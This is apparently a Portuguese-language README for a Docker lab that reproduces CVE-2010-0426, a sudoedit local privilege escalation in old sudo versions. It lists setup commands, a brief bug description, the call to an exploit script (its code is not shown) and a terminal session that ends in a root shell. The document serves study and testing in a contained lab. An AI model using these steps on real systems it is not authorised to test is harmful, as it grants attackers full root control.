
Sudo 1.6.x <= 1.6.9p21 e 1.7.x <= 1.7.2p4 Escalação de Privilégios Local e container vulnerável
Sudo (su "do") permite que um administrador de sistema conceda a certos usuários (ou grupos de usuários) a capacidade de executar alguns (ou todos) comandos como root enquanto registra todos os comandos e argumentos.
Para configurar um ambiente vulnerável para o seu teste, você precisará ter o Docker instalado e basta executar o seguinte comando:
docker build -t privesc/cve-2010-0426 .
docker run --rm -it privesc/cve-2010-0426
E ele iniciará um shell interativo com baixos privilégios de usuário.
O bug foi encontrado no sudoedit, que não trata o comando 'sudoedit' corretamente; isso permite que um usuário malicioso substitua o comando sudoedit real por um comando arbitrário.
Atacantes locais podem explorar esse problema para executar comandos arbitrários como o usuário 'root'. Explorações bem-sucedidas podem comprometer completamente o computador afetado.
Para explorar este alvo, basta executar:
./exploit.sh
Se você estiver usando esta imagem vulnerável, basta executar:
user@023b47ff82ca:~$ sudo -V
Sudo version 1.7.2
user@023b47ff82ca:~$ sudo -l
User user may run the following commands on this host:
(root) NOPASSWD: sudoedit /etc/fstab
user@023b47ff82ca:~$ ./exploit.sh /etc/fstab
[+] CVE-2010-0426 exploit by t0kx
[+] Prepared sudoedit...
[+] Run sudoedit
root@023b47ff82ca:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@023b47ff82ca:/tmp#
Esta falha foi encontrada por Slouching.
Este e os programas anteriores são apenas para fins educacionais SOMENTE. Não os use sem permissão. O aviso legal usual se aplica, especialmente o fato de que eu (t0kx) não sou responsável por quaisquer danos causados pelo uso direto ou indireto das informações ou funcionalidades fornecidas por estes programas. O autor ou qualquer provedor de internet não tem NENHUMA responsabilidade pelo conteúdo ou uso indevido destes programas ou de quaisquer derivados. Ao usar estes programas, você aceita o fato de que qualquer dano (perda de dados, falha do sistema, comprometimento do sistema, etc.) causado pelo uso destes programas não é responsabilidade do t0kx.